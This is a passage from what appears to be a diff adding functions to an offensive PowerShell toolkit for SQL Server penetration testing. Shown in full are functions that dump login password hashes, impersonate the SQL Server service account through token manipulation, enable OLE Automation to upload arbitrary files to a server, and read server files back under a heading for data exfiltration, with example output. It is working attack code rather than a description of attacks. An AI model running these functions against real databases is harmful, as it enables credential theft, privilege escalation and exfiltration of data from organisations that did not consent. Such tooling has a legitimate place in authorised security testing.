-Instance $Instance -Query $AltQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $AltUsername = $AltResults.Username + if($AltUsername.length -ge 2){ + + # Add record to data table + $AltResults | ForEach-Object{ + $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null + } + }else{ + Write-Verbose "$Instance : No alternative auto login credentials found." + } + } + + End + { + # Return data + $TblWinAutoCreds + } +} + + +# ---------------------------------- +# Get-SQLServerPolicy +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLServerPolicy +{ + <# + .SYNOPSIS + Returns policy information related to policy based management. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .EXAMPLE + PS C:\>Get-SQLServerPolicy -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + policy_id : 17 + PolicyName : WatchAllTheThings + condition_id : 18 + ConditionName : DatCheck + facet : Login + ConditionExpression : + Bool + EQ + 2 + + DateTime + DateLastModified + + + DateTime + DateTime + DateTime + 1 + + String + System.String + 2017-09-14T00:00:00.0000000 + + + + root_condition_id : + is_enabled : False + date_created : 9/14/2017 9:01:11 PM + date_modified : + description : Watch all the things. + created_by : sa + is_system : False + target_set_id : 17 + TYPE : LOGIN + type_skeleton : Server/Login + + .EXAMPLE + PS C:\> Get-SQLInstanceLocal |Get-SQLServerPolicy -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblPolicyInfo = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + $Query = " -- Get-SQLServerPolicy.sql + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + p.policy_id, + p.name as [PolicyName], + p.condition_id, + c.name as [ConditionName], + c.facet, + c.expression as [ConditionExpression], + p.root_condition_id, + p.is_enabled, + p.date_created, + p.date_modified, + p.description, + p.created_by, + p.is_system, + t.target_set_id, + t.TYPE, + t.type_skeleton + FROM msdb.dbo.syspolicy_policies p + INNER JOIN msdb.dbo.syspolicy_conditions c + ON p.condition_id = c.condition_id + INNER JOIN msdb.dbo.syspolicy_target_sets t + ON t.object_set_id = p.object_set_id" + + # Execute Query + $TblPolicyInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append as needed + $TblPolicyInfo = $TblPolicyInfo + $TblPolicyInfoTemp + } + + End + { + # Count + $PolNum = $TblPolicyInfo.Count + if($PolNum -eq 0){ + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : No policies found." + } + } + + # Return data + $TblPolicyInfo + } +} + + +# ---------------------------------- +# Get-SQLServerPasswordHash +# ---------------------------------- +# Author: Mike Manzotti (@mmanzo_) +Function Get-SQLServerPasswordHash +{ + <# + .SYNOPSIS + Returns logins from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER PrincipalName + Pincipal name to filter for. + .PARAMETER + Migrate to SQL Server process. + .EXAMPLE + PS C:\> Get-SQLServerPasswordHash -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + PrincipalId : 1 + PrincipalName : sa + PrincipalSid : 7F883D1B... + PrincipalType : SQL_LOGIN + CreateDate : 19/03/2017 08:16:57 + DefaultDatabaseName : master + PasswordHash : 0x0200c8... + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerPasswordHash -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Principal name to filter for.')] + [string]$PrincipalName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Migrate to SQL Server process.')] + [switch]$Migrate, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblPasswordHashes = New-Object -TypeName System.Data.DataTable + $null = $TblPasswordHashes.Columns.Add('ComputerName') + $null = $TblPasswordHashes.Columns.Add('Instance') + $null = $TblPasswordHashes.Columns.Add('PrincipalId') + $null = $TblPasswordHashes.Columns.Add('PrincipalName') + $null = $TblPasswordHashes.Columns.Add('PrincipalSid') + $null = $TblPasswordHashes.Columns.Add('PrincipalType') + $null = $TblPasswordHashes.Columns.Add('CreateDate') + $null = $TblPasswordHashes.Columns.Add('DefaultDatabaseName') + $null = $TblPasswordHashes.Columns.Add('PasswordHash') + + # Setup CredentialName filter + if($PrincipalName) + { + $PrincipalNameFilter = " and name like '$PrincipalName'" + } + else + { + $PrincipalNameFilter = '' + } + } + + Process + { + # Note: Tables queried by this function typically require sysadmin privileges. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + }else{ + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + + # If the migrate flag is set dont't return and attempt to migrate + if($Migrate) + { + # Get current user name + $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name + + # Verify local administrator privileges + $IsAdmin = Get-SQLLocalAdminCheck + + # Return if the current user does not have local admin privs + if($IsAdmin -ne $true){ + write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." + return + }else{ + write-verbose "$Instance : $WinCurrentUserName has local admin privileges." + } + + # Check for running sql service processes that match the instance + Write-Verbose -Message "$Instance : Impersonating SQL Server process:" + [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId + [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount + + # Return if no matches exist + if ($TargetPid -eq 0){ + Write-Verbose -Message "$Instance : No process running for provided instance..." + return + } + + # Status user if a match is found + Write-Verbose -Message "$Instance : - Process ID: $TargetPid" + Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" + + # Attempt impersonation + try{ + Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Impersonation failed." + Write-Verbose -Message " $Instance : $ErrorMessage" + return + } + }else{ + return + } + } + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin." + if($Migrate) + { + # Get current user name + $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name + + # Verify local administrator privileges + $IsAdmin = Get-SQLLocalAdminCheck + + # Return if the current user does not have local admin privs + if($IsAdmin -ne $true){ + write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." + return + }else{ + write-verbose "$Instance : $WinCurrentUserName has local admin privileges." + } + + # Check for running sql service processes that match the instance + Write-Verbose -Message "$Instance : Impersonating SQL Server process:" + [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId + [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount + + # Return if no matches exist + if ($TargetPid -eq 0){ + Write-Verbose -Message "$Instance : No process running for provided instance..." + return + } + + # Status user if a match is found + Write-Verbose -Message "$Instance : - Process ID: $TargetPid" + Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" + + # Attempt impersonation + try{ + Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Impersonation failed." + Write-Verbose -Message " $Instance : $ErrorMessage" + return + } + }else{ + return + } + + } + + # Status user + Write-Verbose -Message "$Instance : Attempting to dump password hashes." + + # Check version + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + if([int]$SQLVersionShort -le 8) + { + + # Define Query + $Query = "USE master; + SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance], + name as [PrincipalName], + createdate as [CreateDate], + dbname as [DefaultDatabaseName], + password as [PasswordHash] + FROM [sysxlogins]" + } + else + { + # Define Query + $Query = "USE master; + SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance], + name as [PrincipalName], + principal_id as [PrincipalId], + type_desc as [PrincipalType], + sid as [PrincipalSid], + create_date as [CreateDate], + default_database_name as [DefaultDatabaseName], + [sys].fn_varbintohexstr(password_hash) as [PasswordHash] + FROM [sys].[sql_logins]" + } + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Update sid formatting for each record + $TblResults | + ForEach-Object -Process { + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') + if ($NewSid.length -le 10) + { + $Sid = [Convert]::ToInt32($NewSid,16) + } + else + { + $Sid = $NewSid + } + + # Add results to table + $null = $TblPasswordHashes.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + [string]$_.PrincipalId, + [string]$_.PrincipalName, + $Sid, + [string]$_.PrincipalType, + $_.CreateDate, + [string]$_.DefaultDatabaseName, + [string](-join('0x0',(($_.PasswordHash).ToUpper().TrimStart("0X")))) + ) + } + + # Status user + Write-Verbose -Message "$Instance : Attempt complete." + + # Revert to original user context + if($Migrate){ + Invoke-TokenManipulation -RevToSelf | Out-Null + } + } + + End + { + + # Get hash count + $PasswordHashCount = $TblPasswordHashes.Rows.Count + write-verbose "$PasswordHashCount password hashes recovered." + + # Return table if hashes exist + if($PasswordHashCount -gt 0){ + + # Return data + $TblPasswordHashes + } + } +} + +#endregion + +######################################################################### +# +#region DATA EXFILTRATION FUNCTIONS +# +######################################################################### + +# ---------------------------------- +# Invoke-SQLUploadFileOle +# ---------------------------------- +# Author: Mariusz B. / mgeeky +# Reference: https://www.blackarrow.net/mssqlproxy-pivoting-clr/ +# Reference: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/ole-automation-stored-procedures-transact-sql?view=sql-server-ver15 +Function Invoke-SQLUploadFileOle +{ + <# + .SYNOPSIS + Uploads given file to the operating system as the SQL Server service account using OLE automation procedures. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER InputFile + Input file to be uploaded to the SQL Server's filesystem. + .PARAMETER OutputFile + Destination file path in the target SQL Server's filesystem. + .EXAMPLE + PS C:\> Invoke-SQLUploadFileOle -Verbose -Instance DEVSRV -InputFile "C:\Windows\win.ini" -OutputFile "C:\Users\Public\win.ini" + VERBOSE: DEVSRV : Connection Success. + VERBOSE: DEVSRV : You are a sysadmin. + VERBOSE: DEVSRV : Show Advanced Options is already enabled. + VERBOSE: DEVSRV : Ole Automation Procedures are already enabled. + VERBOSE: DEVSRV : Reading input file: C:\windows\win.ini + VERBOSE: DEVSRV : Uploading 92 bytes to: C:\Users\Public\win.ini + VERBOSE: DEVSRV : Connection Success. + VERBOSE: DEVSRV : Success. File uploaded. + VERBOSE: Closing the runspace pool + + ComputerName Instance UploadResults + ------------ -------- ------------- + DEVSRV DEVSRV True + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $true, + HelpMessage = 'Input local file to be uploaded to target server.')] + [ValidateScript({ + Test-Path $_ -PathType leaf + })] + [String]$InputFile = "", + + [Parameter(Mandatory = $true, + HelpMessage = 'Destination file path where the file should be uploaded on the remote server.')] + [String]$OutputFile = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('UploadResults') + + + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable + + # Set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Ensure provided instance is processed + if($Instance) + { + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } + } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance + } + + Process + { + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } + + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Switch to track Ole Automation Procedures status + $DisableShowAdvancedOptions = 0 + $DisableOle = 0 + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Check if OLE Automation Procedures are enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsOleEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } + + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 + + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable OLE Automation Procedures if needed + if ($IsOleEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Ole Automation Procedures are already enabled." + } + else + { + Write-Verbose -Message "$Instance : Ole Automation Procedures are disabled." + $DisableOle = 1 + + # Try to enable Ole Automation Procedures + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsOleEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "Ole Automation Procedures"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsOleEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Ole Automation Procedures." + } + else + { + Write-Verbose -Message "$Instance : Enabling Ole Automation Procedures failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Ole Automation Procedures.') + + return + } + } + + $InputFileFull = (Get-Item $InputFile).FullName + write-verbose "$instance : Reading input file: $InputFileFull" + try + { + $FileBytes = [System.IO.File]::ReadAllBytes($InputFileFull) + $FileDataTmp = [System.BitConverter]::ToString($FileBytes) + $FileData = ($FileDataTmp -replace "\-", "") + } + catch + { + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "Could not read input file: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Input file could not be read.') + } + + # Setup query to run command + write-verbose "$instance : Uploading $($FileBytes.Length) bytes to: $OutputFile" + $QueryFileUpload = +@" +DECLARE @ob INT; +EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT; +EXEC sp_OASetProperty @ob, 'Type', 1; +EXEC sp_OAMethod @ob, 'Open'; +EXEC sp_OAMethod @ob, 'Write', NULL, 0x$FileData; +EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '$OutputFile', 2; +EXEC sp_OAMethod @ob, 'Close'; +EXEC sp_OADestroy @ob; +"@ + + # Execute query + $null = Get-SQLQuery -Instance $Instance -Query $QueryFileUpload -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Setup query for reading command output + $QueryCheckFileExists = "EXEC master..xp_fileexist '$OutputFile' WITH RESULT SETS ((fileexists bit, fileisdirectory bit, parentdirectoryexists bit))" + + # Execute query + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCheckFileExists -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property fileexists -ExpandProperty fileexists + + if ($CmdResults -eq $True) + { + Write-Verbose -Message "$Instance : Success. File uploaded." + } + else + { + Write-Verbose -Message "$Instance : Failure. File NOT uploaded." + } + + # Display results or add to final results table + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults) + + # Restore 'Ole Automation Procedures state if needed + if($DisableOle -eq 1) + { + Write-Verbose -Message "$Instance : Disabling 'Ole Automation Procedures" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults + } +} + + +# ---------------------------------- +# Invoke-SQLDownloadFile +# ---------------------------------- +# Author: Mariusz B. / mgeeky +# Reference: https://www.blackarrow.net/mssqlproxy-pivoting-clr/ +# Reference: https://docs.microsoft.com/en-us/sql/relational-databases/import-export/import-bulk-data-by-using-bulk-insert-or-openrowset-bulk-sql-server?view=sql-server-ver15 +Function Invoke-SQLDownloadFile +{ + <# + .SYNOPSIS + Uploads given file to the operating system as the SQL Server service account using OPENROWSET BULK Query. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER SourceFile + Source file to download from target SQL Server's filesystem. + .PARAMETER OutputFile + Where to save downloaded file locally on the user's filesystem. + .EXAMPLE + PS C:\> Invoke-SQLDownloadFile -Verbose -Instance DEVSRV -SourceFile "C:\Windows\win.ini" -OutputFile "C:\Users\Public\win.ini" + VERBOSE: Creating runspace pool and session states + VERBOSE: DEVSRV : Connection Success. + VERBOSE: DEVSRV : File exists. Attempting to download: C:\Windows\win.ini + VERBOSE: DEVSRV : Downloaded. Writing 92 to C:\Users\Public\win.ini... + VERBOSE: Closing the runspace pool + + ComputerName Instance DownloadResults + ------------ -------- --------------- + DEVSRV DEVSRV True + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $true, + HelpMessage = 'Source file to download from target SQL Server filesystem.')] + [String]$SourceFile = "", + + [Parameter(Mandatory = $true, + HelpMessage = 'Where to save downloaded file locally on the user filesystem.')] + [String]$OutputFile = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('DownloadResults') + + + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable + + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Ensure provided instance is processed + if($Instance) + { + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } + } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance + } + + Process + { + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } + + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Setup query for reading command output + $QueryCheckFileExists = "EXEC master..xp_fileexist '$SourceFile' WITH RESULT SETS ((fileexists bit, fileisdirectory bit, parentdirectoryexists bit))" + + # Execute query + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCheckFileExists -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property fileexists -ExpandProperty fileexists + + if ($CmdResults -eq $True) + { + Write-Verbose -Message "$Instance : File exists. Attempting to download: $SourceFile" + + $QueryFileDownload = "SELECT * FROM OPENROWSET(BULK N'$SourceFile', SINGLE_BLOB) rs" + + # Execute query + $FileBytes = Get-SQLQuery -Instance $Instance -Query $QueryFileDownload -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property BulkColumn -ExpandProperty BulkColumn + + $FileBytesArr = $FileBytes -split ' ' + + Write-Verbose "$Instance : Downloaded. Writing $($FileBytesArr.Length) to $OutputFile..." + + $FileContents = ($FileBytesArr | % {[byte][convert]::ToInt32($_)}) + + [IO.File]::WriteAllBytes($OutputFile, $FileContents) + + $null = $TblResults.Rows.Add("$ComputerName","$Instance",$True) + } + else + { + Write-Verbose -Message "$Instance : Failure. Specified file does not exist." + + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Source file does not exist') + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + Write-Verbose " Error: $ErrorMessage" + } + + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables 